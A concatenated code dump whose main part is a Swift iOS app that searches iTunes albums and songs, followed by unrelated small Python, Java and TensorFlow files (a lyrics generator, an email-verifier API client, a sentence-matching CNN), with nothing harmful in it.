// Created by <NAME> on 25.12.2020.
//
import UIKit
final class SearchConfigurator {
static func configure() -> UIViewController {
let view = SearchViewController()
let navigationController = UINavigationController(rootViewController: view)
let router = SearchRouter(view: view)
let presenter = SearchPresenter(view: view, router: router)
view.presenter = presenter
return navigationController
}
}
<file_sep>//
// ConfigurableView.swift
// iTunes Finder
//
// Created by <NAME> on 26.12.2020.
//
import Foundation
protocol ConfigurableView {
associatedtype ConfigurationModel
func configure(with model: ConfigurationModel)
}
<file_sep>//
// ParsableModel.swift
// iTunes Finder
//
// Created by <NAME> on 30.12.2020.
//
import Foundation
protocol ParsableModel {
    init?(data: [String: Any])
}
<file_sep>//
// SearchResultsViewController.swift
// iTunes Finder
//
// Created by <NAME> on 30.12.2020.
//
import UIKit
protocol SearchResultsViewControllerDelegate: AnyObject {
func searchResults(didSelect album: Album)
}
final class SearchResultsViewController: UIViewController {
// MARK: - Public Properties
var presenter: SearchResultsPresenterProtocol?
weak var delegate: SearchResultsViewControllerDelegate?
// MARK: - Private Properties
private lazy var collectionView: UICollectionView = {
let layout = UICollectionViewFlowLayout()
layout.minimumLineSpacing = 16
layout.minimumInteritemSpacing = 16
layout.sectionInset = UIEdgeInsets(top: 16, left: 16, bottom: 16, right: 16)
let collectionView = UICollectionView(frame: .zero, collectionViewLayout: layout)
collectionView.register(AlbumCollectionViewCell.self, forCellWithReuseIdentifier: AlbumCollectionViewCell.identifier)
collectionView.keyboardDismissMode = .onDrag
collectionView.translatesAutoresizingMaskIntoConstraints = false
if #available(iOS 13.0, *) {
collectionView.backgroundColor = .systemBackground
} else {
collectionView.backgroundColor = .white
}
collectionView.dataSource = presenter as? UICollectionViewDataSource
collectionView.delegate = presenter as? UICollectionViewDelegate
return collectionView
}()
// MARK: - UIViewController Events
override func viewDidLoad() {
super.viewDidLoad()
configureVisualAppearance()
configureViews()
}
}
// MARK: - Visual Appearance
extension SearchResultsViewController {
// Groups all methods that are configuring the view’s visual appearance.
private func configureVisualAppearance() {
configureColors()
}
// Configures colors.
private func configureColors() {
// Setting up .systemBackground for the view's backgroundColor
// to support dark theme in iOS 13 or newer
if #available(iOS 13.0, *) {
self.view.backgroundColor = .systemBackground
} else {
self.view.backgroundColor = .white
}
self.view.tintColor = .systemPink
}
}
// MARK: - Layout
extension SearchResultsViewController {
// Groups all methods that are configuring the view.
private func configureViews() {
configureCollectionView()
}
// Configures a collection view.
private func configureCollectionView() {
self.view.addSubview(collectionView)
// Setting up constraints
collectionView.horizontalToSuperview(usingSafeArea: true)
collectionView.verticalToSuperview(usingSafeArea: true)
}
}
// MARK: - SearchResultsPresenter Delegate
extension SearchResultsViewController: SearchResultsViewProtocol {
// Reloads data in the collection view.
func shouldReloadData() {
DispatchQueue.main.async { [weak self] in
self?.collectionView.reloadData()
}
}
// Tells the delegate that user did select an item in the search results.
func shouldPresent(album: Album) {
delegate?.searchResults(didSelect: album)
}
}
<file_sep>//
// Song.swift
// iTunes Finder
//
// Created by <NAME> on 30.12.2020.
//
import Foundation
struct Song: ParsableModel {
// MARK: - Properties
let name: String
// MARK: - Initializers
    init?(data: [String: Any]) {
guard let name = data["trackCensoredName"] as? String else { return nil }
self.name = name
}
}
<file_sep>//
// DataProvider.swift
// iTunes Finder
//
// Created by <NAME> on 27.12.2020.
//
import Foundation
import SwiftyJSON
final class DataProvider {
// MARK: - Types
    typealias AlbumsCompletionBlock = (Result<[Album], Error>) -> Void
    typealias SongsCompletionBlock = (Result<[Song], Error>) -> Void
// MARK: - Public Properties
static let shared = DataProvider()
// MARK: - Private Properties
private let networkManager = NetworkManager()
// MARK: - Public Methods
    // Requests albums from iTunes matching a given search query.
    func get(albumsWithName albumName: String, completion: @escaping AlbumsCompletionBlock) {
        // Percent-encode the query so spaces and special characters form a valid URL.
        let query = albumName.addingPercentEncoding(withAllowedCharacters: .urlQueryAllowed) ?? albumName
        let url = "https://itunes.apple.com/search?term=\(query)&entity=album"
networkManager.request(endpoint: url) { [weak self] data, error in
if let data = data, let albums = self?.parse(data: data, ofType: Album.self) {
completion(.success(albums))
} else if let error = error {
completion(.failure(error))
}
}
}
    // Requests the list of songs for a given album.
func get(songsWithAlbumId albumId: String, completion: @escaping SongsCompletionBlock) {
let url = "https://itunes.apple.com/lookup?id=\(albumId)&entity=song"
networkManager.request(endpoint: url) { [weak self] data, error in
if let data = data, let songs = self?.parse(data: data, ofType: Song.self) {
completion(.success(songs))
} else if let error = error {
completion(.failure(error))
}
}
}
// MARK: - Private Methods
    // Parses raw response data into an array of models of the given type.
    private func parse<T: ParsableModel>(data: Data, ofType: T.Type) -> [T]? {
        guard let json = try? JSON(data: data), let results = json["results"].arrayObject else { return nil }
        var parsedData = [T]()
        for item in results {
            if let itemData = item as? [String: Any], let parsedItem = T(data: itemData) {
                parsedData.append(parsedItem)
            }
        }
        return parsedData
    }
}
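// A usage sketch (hypothetical call site; in the app the request is driven by
// SearchResultsPresenter). The completion may run off the main queue, so UI
// updates should be dispatched back to it:
//
//     DataProvider.shared.get(albumsWithName: "Abbey Road") { result in
//         switch result {
//         case .success(let albums):
//             DispatchQueue.main.async { /* reload the UI with albums */ }
//         case .failure(let error):
//             print(error.localizedDescription)
//         }
//     }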
<file_sep>//
// SearchPresenter.swift
// iTunes Finder
//
// Created by <NAME> on 25.12.2020.
//
import UIKit
protocol SearchViewProtocol: AnyObject {}
protocol SearchPresenterProtocol {
init(view: SearchViewProtocol, router: SearchRouterProtocol)
func moveToSearchDetail(with album: Album)
}
final class SearchPresenter: NSObject, SearchPresenterProtocol {
// MARK: - Properties
private weak var view: SearchViewProtocol?
private let router: SearchRouterProtocol
// MARK: - Initializers
init(view: SearchViewProtocol, router: SearchRouterProtocol) {
self.view = view
self.router = router
}
// MARK: - Methods
// Moves to the SearchDetail module.
func moveToSearchDetail(with album: Album) {
router.moveToSearchDetail(with: album)
}
}
<file_sep>//
// Throttler.swift
// iTunes Finder
//
// Created by <NAME> on 31.12.2020.
//
import Foundation
final class Throttler {
// MARK: - Types
typealias ThrottleBlock = () -> Void
// MARK: - Properties
private var workItem = DispatchWorkItem(block: {})
private var previousWorkItemRun = Date.distantPast
private let queue: DispatchQueue
private let delay: TimeInterval
// MARK: - Initializers
init(delay: TimeInterval, queue: DispatchQueue = .main) {
self.delay = delay
self.queue = queue
}
// MARK: - Methods
func throttle(_ block: @escaping ThrottleBlock) {
// Cancel any existing work item if it has not yet executed.
workItem.cancel()
// Re-assign work item with the new block, resetting
// the previous run time when it executes.
        workItem = DispatchWorkItem { [weak self] in
self?.previousWorkItemRun = Date()
block()
}
        // If the time elapsed since the previous run already exceeds the required
        // delay, execute the work item immediately. Otherwise, postpone it by the
        // delay interval.
        let delayTime = Date().timeIntervalSince(previousWorkItemRun) > delay ? 0 : delay
        queue.asyncAfter(deadline: .now() + delayTime, execute: workItem)
}
}
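// A usage sketch (hypothetical, assuming a 0.5 s delay) showing how the
// throttler coalesces rapid search-bar input into a single piece of work:
//
//     let throttler = Throttler(delay: 0.5)
//     func updateSearchResults(for searchController: UISearchController) {
//         throttler.throttle { /* fire the search request here */ }
//     }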
<file_sep>platform :ios, '12.0'
target 'iTunes Finder' do
use_frameworks!
pod 'TinyConstraints'
pod 'SwiftyJSON', '~> 4.0'
pod 'Nuke', '~> 9.0'
post_install do |installer|
installer.pods_project.targets.each do |target|
target.build_configurations.each do |config|
config.build_settings.delete 'IPHONEOS_DEPLOYMENT_TARGET'
end
end
end
end
<file_sep>//
// SearchResultsConfigurator.swift
// iTunes Finder
//
// Created by <NAME> on 30.12.2020.
//
import UIKit
final class SearchResultsConfigurator {
static func configure() -> UIViewController {
let view = SearchResultsViewController()
let router = SearchResultsRouter(view: view)
let presenter = SearchResultsPresenter(view: view, router: router)
view.presenter = presenter
return view
}
static func configure(with query: String) -> UIViewController {
let view = SearchResultsViewController()
let router = SearchResultsRouter(view: view)
let presenter = SearchResultsPresenter(view: view, router: router, query: query)
view.presenter = presenter
view.navigationItem.title = query
return view
}
}
<file_sep>//
// SearchHistoryTableViewCell.swift
// iTunes Finder
//
// Created by <NAME> on 29.12.2020.
//
import UIKit
final class SearchHistoryTableViewCell: UITableViewCell, ConfigurableView {
// MARK: - Public Properties
static let identifier = "SearchHistoryTableViewCell"
// MARK: - Private Properties
private let queryLabel: UILabel = {
let queryLabel = UILabel()
queryLabel.font = UIFont.preferredFont(forTextStyle: .body)
queryLabel.numberOfLines = 1
queryLabel.translatesAutoresizingMaskIntoConstraints = false
if #available(iOS 13.0, *) {
queryLabel.textColor = .label
} else {
queryLabel.textColor = .black
}
return queryLabel
}()
// MARK: - Initializers
override init(style: UITableViewCell.CellStyle, reuseIdentifier: String?) {
super.init(style: style, reuseIdentifier: reuseIdentifier)
configureViews()
}
required init?(coder: NSCoder) {
super.init(coder: coder)
configureViews()
}
// MARK: - Public Methods
// Configures a cell with data from a model.
func configure(with model: SearchItem) {
queryLabel.text = model.query
}
// MARK: - Layout
// Groups all methods that are configuring the view.
private func configureViews() {
configureQueryLabel()
}
// Configures a label.
private func configureQueryLabel() {
        self.contentView.addSubview(queryLabel)
// Setting up constraints
queryLabel.centerYToSuperview()
queryLabel.horizontalToSuperview(insets: .horizontal(20))
}
}
<file_sep>//
// SearchHistoryRouter.swift
// iTunes Finder
//
// Created by <NAME> on 25.12.2020.
//
import UIKit
protocol SearchHistoryRouterProtocol {
init(view: UIViewController)
func moveToSearchResults(with query: String)
func moveToSearchDetail(with album: Album)
}
final class SearchHistoryRouter: SearchHistoryRouterProtocol {
// MARK: - Properties
private weak var view: UIViewController?
// MARK: - Initializers
init(view: UIViewController) {
self.view = view
}
// MARK: - Methods
// Moves view to a SearchResults module.
func moveToSearchResults(with query: String) {
guard
let view = view as? SearchHistoryViewController,
let navigationController = view.navigationController,
let viewController = SearchResultsConfigurator.configure(with: query) as? SearchResultsViewController
else {
return
}
viewController.delegate = view
navigationController.pushViewController(viewController, animated: true)
}
// Moves view to a SearchDetail module.
func moveToSearchDetail(with album: Album) {
guard let view = view, let navigationController = view.navigationController else { return }
let viewController = SearchDetailConfigurator.configure(with: album)
navigationController.pushViewController(viewController, animated: true)
}
}
<file_sep>//
// CoreDataStack.swift
// iTunes Finder
//
// Created by <NAME> on 28.12.2020.
//
import CoreData
final class CoreDataStack {
// MARK: - Types
typealias ContextBlock = (NSManagedObjectContext) -> Void
// MARK: - Public Properties
static let shared = CoreDataStack()
// MARK: - Private Properties
private lazy var persistentContainer: NSPersistentContainer = {
let container = NSPersistentContainer(name: "Data")
container.loadPersistentStores { _, error in
if let error = error {
print("Unable to load Persistent Stores: \(error.localizedDescription)")
}
}
return container
}()
private lazy var backgroundContext: NSManagedObjectContext = {
let context = persistentContainer.newBackgroundContext()
context.mergePolicy = NSMergeByPropertyObjectTrumpMergePolicy
return context
}()
private(set) lazy var viewContext: NSManagedObjectContext = {
let context = persistentContainer.viewContext
context.automaticallyMergesChangesFromParent = true
context.mergePolicy = NSMergeByPropertyObjectTrumpMergePolicy
return context
}()
// MARK: - Methods
// Performs data saving in the background context.
func save(_ block: @escaping ContextBlock) {
let context = backgroundContext
context.perform {
block(context)
if context.hasChanges {
do {
try context.save()
} catch let error {
print("Unable to save context: \(error.localizedDescription)")
}
}
}
}
}
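// A usage sketch (hypothetical) of persisting a search query on the background
// context, using the convenience initializer from SearchItem+Init.swift:
//
//     CoreDataStack.shared.save { context in
//         _ = SearchItem(query: "Abbey Road", createdDate: Date(), context: context)
//     }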
<file_sep>//
// SearchHistoryViewController.swift
// iTunes Finder
//
// Created by <NAME> on 25.12.2020.
//
import UIKit
final class SearchHistoryViewController: UIViewController {
// MARK: - Public Properties
var presenter: SearchHistoryPresenterProtocol?
// MARK: - Private Properties
private lazy var tableView: UITableView = {
let tableView = UITableView()
tableView.register(SearchHistoryTableViewCell.self, forCellReuseIdentifier: SearchHistoryTableViewCell.identifier)
tableView.sectionHeaderHeight = 16
tableView.sectionFooterHeight = 16
if #available(iOS 13.0, *) {
tableView.backgroundColor = .systemBackground
} else {
tableView.backgroundColor = .white
}
tableView.dataSource = presenter as? UITableViewDataSource
tableView.delegate = presenter as? UITableViewDelegate
return tableView
}()
// MARK: - UIViewController Events
override func viewDidLoad() {
super.viewDidLoad()
configureVisualAppearance()
configureViews()
}
}
// MARK: - Visual Appearance
extension SearchHistoryViewController {
// Groups all methods that are configuring the view’s visual appearance.
private func configureVisualAppearance() {
configureColors()
configureNavigationTitle()
}
// Configures colors.
private func configureColors() {
// Setting up .systemBackground for the view's backgroundColor
// to support dark theme in iOS 13 or newer.
if #available(iOS 13.0, *) {
self.view.backgroundColor = .systemBackground
} else {
self.view.backgroundColor = .white
}
self.view.tintColor = .systemPink
}
// Configures a title in the navigation bar.
private func configureNavigationTitle() {
        // Ask the navigation bar to display the title using a larger font when possible
        navigationController?.navigationBar.prefersLargeTitles = true
self.navigationItem.title = "History"
}
}
// MARK: - Layout
extension SearchHistoryViewController {
// Groups all methods that are configuring the view.
private func configureViews() {
configureTableView()
}
// Configures a table view to display search history.
private func configureTableView() {
self.view.addSubview(tableView)
// Setting up constraints
tableView.horizontalToSuperview()
tableView.verticalToSuperview(usingSafeArea: true)
}
}
// MARK: - SearchHistoryPresenter Delegate
extension SearchHistoryViewController: SearchHistoryViewProtocol {
    // Prepares the table view for changes in its content.
func tableView(shouldSetUpdates state: Bool) {
switch state {
case true:
tableView.beginUpdates()
case false:
tableView.endUpdates()
}
}
// Inserts rows in the table view.
func tableView(shouldInsertRowsAt indexPath: [IndexPath]) {
tableView.insertRows(at: indexPath, with: .automatic)
}
// Moves rows in the table view.
func tableView(shouldMoveRowAt indexPath: IndexPath, to newIndexPath: IndexPath) {
tableView.deleteRows(at: [indexPath], with: .automatic)
tableView.insertRows(at: [newIndexPath], with: .automatic)
}
// Reloads rows in the table view.
func tableView(shouldReloadRowsAt indexPath: [IndexPath]) {
tableView.reloadRows(at: indexPath, with: .automatic)
}
// Deletes rows in the table view.
func tableView(shouldDeleteRowsAt indexPath: [IndexPath]) {
tableView.deleteRows(at: indexPath, with: .automatic)
}
}
// MARK: - SearchResultsViewController Delegate
extension SearchHistoryViewController: SearchResultsViewControllerDelegate {
    // Asks the presenter to move to the SearchDetail module.
func searchResults(didSelect album: Album) {
presenter?.moveToSearchDetail(with: album)
}
}
<file_sep>//
// Album.swift
// iTunes Finder
//
// Created by <NAME> on 25.12.2020.
//
import Foundation
struct Album: ParsableModel {
// MARK: - Properties
let id: String
let name: String
let artistName: String
let price: String
let currency: String
let artworkUrl: String
let releaseDate: String
// MARK: - Initializers
init?(data: Dictionary<String, Any>) {
guard
let id = data["collectionId"] as? Int,
let name = data["collectionName"] as? String,
let artistName = data["artistName"] as? String,
let price = data["collectionPrice"] as? Double,
let currency = data["currency"] as? String,
let artworkUrl = data["artworkUrl100"] as? String,
let releaseDate = data["releaseDate"] as? String
else {
return nil
}
self.id = String(id)
self.name = name
self.artistName = artistName
self.price = String(price)
self.currency = currency
self.artworkUrl = artworkUrl
self.releaseDate = releaseDate
}
}
<file_sep>//
// SearchCollectionViewCell.swift
// iTunes Finder
//
// Created by <NAME> on 25.12.2020.
//
import UIKit
import TinyConstraints
import Nuke
final class AlbumCollectionViewCell: UICollectionViewCell, ConfigurableView {
// MARK: - Public Properties
static let identifier = "AlbumCollectionViewCell"
// MARK: - Private Properties
private let artworkImageView: UIImageView = {
let artworkImageView = UIImageView()
artworkImageView.contentMode = .scaleAspectFit
artworkImageView.translatesAutoresizingMaskIntoConstraints = false
if #available(iOS 13.0, *) {
artworkImageView.backgroundColor = .systemGray6
} else {
artworkImageView.backgroundColor = UIColor(red: 0.95, green: 0.95, blue: 0.97, alpha: 1.00)
}
return artworkImageView
}()
private let activityIndicatorView: UIActivityIndicatorView = {
let activityIndicatorView = UIActivityIndicatorView()
activityIndicatorView.startAnimating()
activityIndicatorView.hidesWhenStopped = true
activityIndicatorView.translatesAutoresizingMaskIntoConstraints = false
if #available(iOS 13.0, *) {
activityIndicatorView.style = .medium
} else {
activityIndicatorView.style = .gray
}
return activityIndicatorView
}()
// MARK: - Initializers
override init(frame: CGRect) {
super.init(frame: frame)
configureViews()
}
required init?(coder: NSCoder) {
super.init(coder: coder)
configureViews()
}
// MARK: - UICollectionViewCell Methods
override func prepareForReuse() {
super.prepareForReuse()
// Resets properties before the cell is reused
self.artworkImageView.image = nil
self.activityIndicatorView.startAnimating()
}
// MARK: - Public Methods
// Configures a cell with data from a model.
func configure(with model: Album) {
// Loading an album artwork image
if let url = URL(string: model.artworkUrl) {
let options = ImageLoadingOptions(transition: .fadeIn(duration: 0.33))
Nuke.loadImage(with: url, options: options, into: artworkImageView) { [weak self] _ in
self?.activityIndicatorView.stopAnimating()
}
}
}
// MARK: - Layout
// Groups all methods that configure the view.
private func configureViews() {
configureArtworkImageView()
configureActivityIndicatorView()
}
// Configures an image view for an album artwork image.
private func configureArtworkImageView() {
self.contentView.addSubview(artworkImageView)
// Setting up constraints
artworkImageView.horizontalToSuperview()
artworkImageView.verticalToSuperview()
}
// Configures an activity indicator to display an image loading process.
private func configureActivityIndicatorView() {
self.contentView.addSubview(activityIndicatorView)
// Setting up constraints
activityIndicatorView.centerXToSuperview()
activityIndicatorView.centerYToSuperview()
}
}
<file_sep>//
// SearchDetailPresenter.swift
// iTunes Finder
//
// Created by <NAME> on 30.12.2020.
//
import UIKit
protocol SearchDetailViewProtocol: class {
func shouldReloadData()
}
protocol SearchDetailPresenterProtocol {
init(view: SearchDetailViewProtocol, router: SearchDetailRouterProtocol, album: Album)
func fetchSongs()
}
final class SearchDetailPresenter: NSObject, SearchDetailPresenterProtocol {
// MARK: - Properties
private weak var view: SearchDetailViewProtocol?
private let router: SearchDetailRouterProtocol
private let album: Album
private var songs: Array<Song> = [] {
didSet {
view?.shouldReloadData()
}
}
// MARK: - Initializers
init(view: SearchDetailViewProtocol, router: SearchDetailRouterProtocol, album: Album) {
self.view = view
self.router = router
self.album = album
}
// MARK: - Methods
// Fetches a song list of the album.
func fetchSongs() {
DataProvider.shared.get(songsWithAlbumId: album.id) { [weak self] result in
switch result {
case .success(let songs):
// Setting the album's song list
self?.songs = songs
case .failure(let error):
// Presenting an error message if something went wrong
DispatchQueue.main.async {
self?.router.presentAlert(title: "Error", message: error.localizedDescription)
}
}
}
}
}
// MARK: - UITableView Data Source
extension SearchDetailPresenter: UITableViewDataSource {
func tableView(_ tableView: UITableView, numberOfRowsInSection section: Int) -> Int {
return songs.count
}
func tableView(_ tableView: UITableView, cellForRowAt indexPath: IndexPath) -> UITableViewCell {
guard let cell = tableView.dequeueReusableCell(withIdentifier: SongTableViewCell.identifier, for: indexPath) as? SongTableViewCell else { return UITableViewCell() }
let song = songs[indexPath.row]
cell.configure(with: song)
return cell
}
}
// MARK: - UITableView Delegate
extension SearchDetailPresenter: UITableViewDelegate {
func tableView(_ tableView: UITableView, heightForHeaderInSection section: Int) -> CGFloat {
return UITableView.automaticDimension
}
func tableView(_ tableView: UITableView, estimatedHeightForHeaderInSection section: Int) -> CGFloat {
return 320
}
func tableView(_ tableView: UITableView, viewForHeaderInSection section: Int) -> UIView? {
// Configures a header view to display detailed information about the album
guard let view = tableView.dequeueReusableHeaderFooterView(withIdentifier: AlbumTableViewHeader.identifier) as? AlbumTableViewHeader else { return UIView() }
view.configure(with: album)
return view
}
}
<file_sep>//
// NetworkManager.swift
// iTunes Finder
//
// Created by <NAME> on 27.12.2020.
//
import Foundation
final class NetworkManager {
// MARK: - Types
typealias CompletionBlock = (Data?, Error?) -> Void
// MARK: - Methods
// Loads data from the network at the specified URL.
func request(endpoint url: String, completion: @escaping CompletionBlock) {
guard let urlString = url.addingPercentEncoding(withAllowedCharacters: .urlQueryAllowed),
let url = URL(string: urlString) else { return }
let dataTask = URLSession.shared.dataTask(with: url) { data, _, error in
completion(data, error)
}
dataTask.resume()
}
}
<file_sep># iTunes Finder
|
73755955eae451450553c76cd26364435403e93f
|
[
"Swift",
"Ruby",
"Markdown"
] | 34 |
Swift
|
weakvar/iTunes-Finder
|
9ef0d454fb12822922af55249e994fa87e307795
|
27a2c3a0a6e86896f45b57b74a109a2c300b91bf
|
refs/heads/main
|
<repo_name>Steve0929/taylorbot<file_sep>/create.py
from tensorflow import keras
from tensorflow.keras import layers
import numpy as np
import random
import io
maxlen = 40
diversity = 1.0
#Prepare the data
with io.open("ts_songs.txt", encoding="utf-8") as f:
text = f.read().lower()
text = text.replace("\n", " ") # We remove newline chars for nicer display
chars = sorted(list(set(text)))
char_indices = dict((c, i) for i, c in enumerate(chars))
indices_char = dict((i, c) for i, c in enumerate(chars))
total_chars = len(chars)
# Recreate exactly the same model from the file alone
model = keras.models.load_model('saved_model.h5')
def sample(preds, temperature=1.2):
# helper function to sample an index from a probability array
preds = np.asarray(preds).astype("float64")
preds = np.log(preds) / temperature
exp_preds = np.exp(preds)
preds = exp_preds / np.sum(exp_preds)
probas = np.random.multinomial(1, preds, 1)
return np.argmax(probas)
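To see in isolation how the temperature/diversity parameter reshapes the predicted distribution, here is a small self-contained sketch (the probabilities below are made up for illustration):

```python
import numpy as np

def apply_temperature(preds, temperature):
    # Rescale a probability distribution: T < 1 sharpens it, T > 1 flattens it.
    preds = np.asarray(preds).astype("float64")
    preds = np.log(preds) / temperature
    exp_preds = np.exp(preds)
    return exp_preds / np.sum(exp_preds)

probs = np.array([0.7, 0.2, 0.1])       # hypothetical next-char distribution
sharp = apply_temperature(probs, 0.5)   # low temperature -> closer to greedy
flat = apply_temperature(probs, 2.0)    # high temperature -> more random
# The most likely character gains mass at low temperature and loses it at high.
assert sharp[0] > probs[0] > flat[0]
```

This is why a diversity of 1.0 above reproduces the model's raw distribution, while values above 1.0 make the generated lyrics more surprising.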
sentence = "i love the haters because im just gonna " #must be 40 chars long
generated = sentence
for i in range(400):
x_pred = np.zeros((1, maxlen, total_chars))
for t, char in enumerate(sentence):
x_pred[0, t, char_indices[char]] = 1.0
preds = model.predict(x_pred, verbose=0)[0]
next_index = sample(preds, diversity)
next_char = indices_char[next_index]
sentence = sentence[1:] + next_char
generated += next_char
print("...Generated: ", generated)
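The one-hot encoding performed inside the generation loop can be checked on its own; the character set and sentence below are hypothetical stand-ins:

```python
import numpy as np

chars = sorted(list(set("abca")))                  # -> ['a', 'b', 'c']
char_indices = {c: i for i, c in enumerate(chars)}

sentence = "cab"
x_pred = np.zeros((1, len(sentence), len(chars)))
for t, char in enumerate(sentence):
    x_pred[0, t, char_indices[char]] = 1.0         # one-hot per time step

assert x_pred[0, 0, char_indices["c"]] == 1.0
assert x_pred[0].sum() == len(sentence)            # exactly one 1 per position
```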
<file_sep>/README.md
# taylorbot
Taylor Swift lyrics generator
|
f1f0a39dd311d4da1d08899b0d89d285daddaa19
|
[
"Markdown",
"Python"
] | 2 |
Python
|
Steve0929/taylorbot
|
43aab38ca1c4d38084949e0462901406d46a8449
|
abddb505392ce24c41fd9cce0b2a881eae1bdaf7
|
refs/heads/master
|
<file_sep>//This code is written by <NAME>. It removes duplicate elements from an array.
//For any queries, contact him at <EMAIL>.
public class MainClass {
public static void main(String[] args) {
// TODO Auto-generated method stub
int [] a= {1,7,7,7,9,9,10,10,10,11,11,1};
removeduplicates(a);
}
public static void removeduplicates(int[]a)
{
int flag=0;
int b =0;
int k=0;
int [] temp = new int[a.length];
for(int i=0;i<a.length;i++)
{
int key = a[i];
for(int j=i+1;j<a.length;j++)
{
if(key==a[j])
{
flag++;
}
}
if(flag==0)
{
temp[k] = key;
k++;
}
else
{
for( int m=0;m<temp.length;m++)
{
if(key==temp[m])
{
b++;
}
}
if(b==0)
{
temp[k] = key;
k++;
}
}
flag = 0;
b = 0;
}
for(int i=0;i<k;i++)
System.out.println(temp[i]);
}
}
<file_sep>import java.util.Hashtable;
public class MainClass {
public static void main(String[] args) {
// TODO Auto-generated method stub
Hashtable<Integer, String> hs= new Hashtable<Integer, String>();
hs.put(1, "Raaj");
hs.put(0, "Andy");
hs.put(2, "Mohsen");
System.out.println(hs);
hs.put(0, hs.get(0)+"Lee");
System.out.println(hs);
/*Average case complexity
Hash table insertion time = O(1)
Hash table search time = O(1)
Hash table deletion time = O(1)
*/
/*Worst case complexity
Hash table insertion time = O(n)
Hash table search time = O(n)
Hash table deletion time = O(n)
*/
//Worst case space complexity is O(n)
}
}
<file_sep>//This project is written by <NAME> and is licensed under Craftsilicon, Nairobi, Kenya. The email verifier
//program checks the existence of an email address using the third-party API EmailVerifierApp (https://www.emailverifierapi.com/).
//Feel free to use and modify the code, and contact <EMAIL> with any questions.
package javaapplication2;
import java.io.BufferedReader;
import java.io.DataOutputStream;
import java.io.IOException;
import java.io.InputStreamReader;
import java.net.HttpURLConnection;
import java.net.MalformedURLException;
import java.net.ProtocolException;
import java.net.URL;
import java.nio.charset.StandardCharsets;
import java.util.Scanner;
/**
*
* @author user
*/
public class JavaApplication2 {
/**
* @param args the command line arguments
*/
public static void main(String[] args) throws ProtocolException, MalformedURLException, IOException {
// TODO code application logic here
Scanner input = new Scanner(System.in);
System.out.println("Enter the email id to validate");
String emailValidate = input.nextLine();
//String emailValidate = "<EMAIL>";
String apiKey = "<KEY>";
String serviceUri = "https://emailverifierapi.com/v2/";
String post_data = "apiKey=" + apiKey + "&email=" + emailValidate;
//sending a POSTrequest
URL obj = new URL(serviceUri);
HttpURLConnection con = (HttpURLConnection) obj.openConnection();
con.setRequestMethod("POST");
con.setDoOutput(true);
byte[] b = post_data.getBytes(StandardCharsets.US_ASCII);
con.setRequestProperty("Content-Type", "application/x-www-form-urlencoded");
con.setRequestProperty("Content-Length",Integer.toString(b.length));
try (DataOutputStream wr = new DataOutputStream(con.getOutputStream())) {
wr.write(b, 0, b.length);
}
StringBuilder response;
try (BufferedReader in = new BufferedReader(
new InputStreamReader(con.getInputStream()))) {
String inputLine;
response = new StringBuilder();
while ((inputLine = in.readLine()) != null) {
response.append(inputLine);
}
}
//print result
System.out.println(response.toString());
}
}
|
16918cec68c5e3f5519c7c35393e520b808fb202
|
[
"Java"
] | 3 |
Java
|
MindSparkTm/JavaDataStructuresHacks
|
811af3425972765d9a237a9fbbabf41938b7bcbc
|
6498b12151992876516b578844548b59d397ab4b
|
refs/heads/master
|
<file_sep>import tensorflow as tf
import numpy as np
class SentCNN(object):
"""
A CNN for utterance and relation pair matching regression.
Uses an embedding layer, convolutional layer, max-pooling layer,
and a logistic regression layer.
"""
def __init__(self,
sequence_length,
num_classes,
init_embeddings,
filter_sizes,
num_filters,
batch_size, # only need this for dropout layer
embeddings_trainable=False,
l2_reg_lambda=0.0):
"""
:param sequence_length: The length of our sentences. Here we always pad
our sentences to have the same length (depending on the longest sentences
in our dataset).
:param num_classes: Number of classes in the output layer.
:param init_embeddings: Pre-trained word embeddings or initialized values.
:param filter_sizes: The number of words we want our convolutional filters to cover.
We will have num_filters for each size specified here. For example, [3, 4, 5]
means that we will have filters that slide over 3, 4 and 5 words respectively,
for a total of 3 * num_filters filters.
:param num_filters: The number of filters per filter size (see above).
:param embeddings_trainable: Train embeddings or not.
"""
# Placeholders for input, output and dropout
# input_x_u: batch_size x sequence_length
self.input_x_u = tf.placeholder(tf.int32,
[None, sequence_length],
name="input_x_u")
# input_x_r: batch_size x num_classes x sequence_length
self.input_x_r = tf.placeholder(tf.int32,
[None, num_classes, sequence_length],
name="input_x_r")
# input_y: batch_size,
self.input_y = tf.placeholder(tf.int64,
[None],
name="input_y")
self.dropout_keep_prob = tf.placeholder(tf.float32, name="dropout_keep_prob")
self.embedding_size = np.shape(init_embeddings)[1]
# Store the sequence_length used for the training, needed for test inference.
self.sequence_length = tf.Variable(sequence_length, trainable=False, dtype=tf.int32, name="sequence_length")
# Keeping track of l2 regularization loss (optional)
l2_loss = tf.constant(0.0)
# Embedding layer
with tf.name_scope("embedding"):
W = tf.Variable(init_embeddings,
trainable=embeddings_trainable,
dtype=tf.float32,
name='W')
# batch_size x sequence_length x embedding_size
self.embedded_u = tf.nn.embedding_lookup(W, self.input_x_u)
print("DEBUG: embedded_u -> %s" % self.embedded_u)
# batch_size x num_classes x sequence_length x embedding_size
self.embedded_r = tf.nn.embedding_lookup(W, self.input_x_r)
print("DEBUG: embedded_r -> %s" % self.embedded_r)
# Create a convolution + maxpooling layer for each filter size
pooled_outputs_u = []
pooled_outputs_r = []
for i, filter_size in enumerate(filter_sizes):
with tf.name_scope("conv-maxpool-%s-u" % filter_size):
# Convolution layer
filter_shape = [filter_size, self.embedding_size, num_filters]
W = tf.Variable(tf.truncated_normal(filter_shape, stddev=0.1), name='W')
b = tf.Variable(tf.constant(0.1, shape=[num_filters]), name='b')
l2_loss += tf.nn.l2_loss(W)
l2_loss += tf.nn.l2_loss(b)
conv_u1d = tf.nn.conv1d(
self.embedded_u,
W,
stride=1,
padding="VALID",
name="conv-u")
# Apply nonlinearity
h_u = tf.nn.sigmoid(tf.nn.bias_add(conv_u1d, b), name="activation-u")
# Maxpooling over outputs
pooled_u1d = tf.nn.pool(
h_u,
window_shape=[sequence_length - filter_size + 1],
pooling_type="MAX",
padding="VALID",
strides=[1],
name="pool-u")
pooled_outputs_u.append(pooled_u1d)
# Pass each element in x_r through the same layer
pooled_outputs_r_wclasses = []
for j in range(num_classes):
embedded_r_j = self.embedded_r[:, j, :, :]
conv_r_j = tf.nn.conv1d(
embedded_r_j,
W,
stride=1,
padding="VALID",
name="conv-r-%s" % j)
h_r_j = tf.nn.sigmoid(tf.nn.bias_add(conv_r_j, b), name="activation-r-%s" % j)
pooled_r_j = tf.nn.pool(
h_r_j,
window_shape=[sequence_length - filter_size + 1],
pooling_type="MAX",
strides=[1],
padding="VALID",
name="pool-r-%s" % j)
pooled_outputs_r_wclasses.append(pooled_r_j)
